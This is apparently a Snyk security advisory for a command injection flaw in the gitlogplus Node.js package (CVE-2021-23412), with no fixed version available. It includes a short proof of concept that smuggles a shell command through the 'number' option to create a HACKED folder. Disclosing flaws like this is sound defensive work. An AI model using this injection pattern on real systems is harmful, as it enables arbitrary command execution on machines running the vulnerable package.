Command Injection Affecting gitlogplus package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
18.72% (97th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-GITLOGPLUS-1315832
- published 23 Jul 2021
- disclosed 2 Jul 2021
- credit Rafal Janicki
Introduced: 2 Jul 2021
CVE-2021-23412 Open this link in a new tabHow to fix?
There is no fixed version for gitlogplus.
Overview
gitlogplus is a Git log parser for Node.JS
Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.
PoC by Rafal Janicki
# 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository
"use strict"
const gitlog = require('gitlogplus');
const options =
{
repo: __dirname + '/git',
number: '20; mkdir ../HACKED; git log '
};
let commits = gitlog(options);
console.log(commits);
References
CVSS Scores
version 3.1